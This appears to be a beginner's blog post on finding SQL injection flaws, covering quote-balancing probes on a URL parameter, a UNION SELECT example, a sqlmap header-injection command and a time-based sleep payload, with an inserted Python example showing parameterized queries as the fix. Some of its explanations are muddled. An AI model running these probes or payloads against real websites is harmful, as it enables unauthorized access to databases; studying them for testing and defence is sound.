How to Find SQL Injection Attack Vulnerabilities in 2022?

Nitin Yadav
3 min read · Sep 10, 2022

SQL Injection (also written SQLi, for Structured Query Language injection) is one of the most common and severe web vulnerabilities.

It is one of the most widespread and dangerous vulnerabilities on the Internet.

It is an attack in which malicious input is used to make the database behind an application execute SQL the developer never intended, bypassing the security controls of the system that holds the data.

Depending on the privileges of the database account, this gives attackers wide latitude to read, create and alter the rest of the website's structure and content, up to complete control over it.

The bad thing about SQL Injection is that it is difficult to detect and stop while it is being exploited.

Discovering a SQL Injection vulnerability can be horrifying because it allows an attacker to directly access, and potentially compromise, the underlying data of your site.

In this article, I’ll show you what SQL injection is and how to locate it.

What is SQL injection?

This attack consists of the insertion or “injection” of a SQL query via the input data from the client to the application.

It allows an attacker to view data that they are not normally able to retrieve.

This might include data belonging to other users, or any other data that the application itself is able to access.

In many cases, attackers can modify or delete this data, causing persistent changes to the application’s content or behavior.

Basic SQL Statements

  1. SELECT - The introductory statement, because it is used together with most other commands. It is the basic statement in SQL.
  2. WHERE - Does what it sounds like: it filters the rows. Example: SELECT name, age FROM Class_details WHERE age < 10. This command returns the data from the columns name and age, but only for rows whose age is less than 10 years.
  3. ORDER BY - Sorts the results in ascending or descending order. Use ASC for ascending and DESC for descending.

How to test for SQL Injection

Example 1:

Let's take the query SELECT * FROM Table WHERE id='1';

What this query says is: select all columns from Table for the row whose id is 1.

So let's now understand what we want to do to test for SQL Injection.

If we add a single ' the quotes are unbalanced and the query is false (it fails); if we add '' they are balanced again and the query is true (it succeeds).

In the same way, a single " gives false and a pair "" gives true.

And a single \ gives false, while \\ gives true.

I know you are a bit confused about true or false but you will get it now.

When testing a website we usually only see a parameter such as id (or whatever else the URL exposes), so that parameter is what we work with.

Let’s say the URL is like

www.website.com?id=1

and for that the query will be SELECT * FROM Table WHERE id='1';

so the inputs we test with are

www.website.com?id=1'

or

www.website.com?id=1"

or

www.website.com?id=1\

so the resulting queries will look like

SELECT * FROM Table WHERE id='1'';

SELECT * FROM Table WHERE id='1"';

SELECT * FROM Table WHERE id='1\';

And remember that you have to complete (re-balance) the query before you can use another SQL statement:

SELECT * FROM Table WHERE id='1''';

or you can use

SELECT * FROM Table WHERE id='1''''''''''''UNION SELECT '2';

which may return the data for id 2.
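The quote-balance test above, as an added example that is not from the original post: the string-built query the post describes, next to a parameterized version, run against a constructed in-memory SQLite table. The table, rows and function names are assumptions for illustration; note that SQLite, unlike MySQL, does not treat backslash as an escape, and a double quote inside a single-quoted literal is plain data in either, so against this table only the odd single quote breaks the statement.

```python
import sqlite3

# Constructed sample table and rows, standing in for the post's "Table" (not from the post).
SETUP = [
    "CREATE TABLE items (id TEXT, name TEXT)",
    "INSERT INTO items VALUES ('1', 'first'), ('2', 'second')",
]


def _connect():
    conn = sqlite3.connect(":memory:")
    for stmt in SETUP:
        conn.execute(stmt)
    return conn


def vulnerable_lookup(user_id):
    """Pattern the post describes: the URL value is pasted straight into the SQL text."""
    query = "SELECT * FROM items WHERE id='" + user_id + "'"
    try:
        return ("ok", _connect().execute(query).fetchall())
    except sqlite3.Error as exc:
        # A syntax error is the "false" signal: the probe changed the statement itself.
        return ("error", str(exc))


def parameterized_lookup(user_id):
    """Hardened form: the value is bound as data, so quotes cannot alter the statement."""
    rows = _connect().execute("SELECT * FROM items WHERE id=?", (user_id,)).fetchall()
    return ("ok", rows)


PROBES = ["", "'", "''", '"', "\\"]  # the post's probe characters, unbalanced and balanced


def probe(lookup):
    """Append each probe to id=1 and record whether the query still parses."""
    return {suffix: lookup("1" + suffix)[0] for suffix in PROBES}


def looks_injectable(lookup):
    """The post's rule: one quote breaks the query, two quotes do not."""
    results = probe(lookup)
    return results["'"] == "error" and results["''"] == "ok"


if __name__ == "__main__":
    print("string-built :", probe(vulnerable_lookup), looks_injectable(vulnerable_lookup))
    print("parameterized:", probe(parameterized_lookup), looks_injectable(parameterized_lookup))
```

The parameterized version returns "ok" for every probe because the quote is stored and compared as part of the value, never parsed as SQL.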

For Example 2, visit www.cyberhacks200.org

Some Tips for finding SQL injection

  1. Using sqlmap, injecting through a header (the * is the injection marker):
    sqlmap -u "http://website.com" --header="X-Forwarded-For: 1*" --dbs --batch --random-agent --threads=10
  2. Time-based SQLi payload:
    '%2b(select*from(select(sleep(20)))a)%2b'

For more tips, visit www.cyberhacks200.org

I hope you all like the blog. If so, comment down below, and if you find any vuln please let me know; I will be very happy to hear about it. If you want to see other blogs like this, comment down too.

If you want to write your own blog for cyberhacks200.org, you can contact me.

We will meet in another blog.

Till then,

take care and happy hacking.

Nitin Yadav

Computer Science Student | Bug Hunter | Cyber Security Enthusiast | Contact : https://linktr.ee/ydv_nitin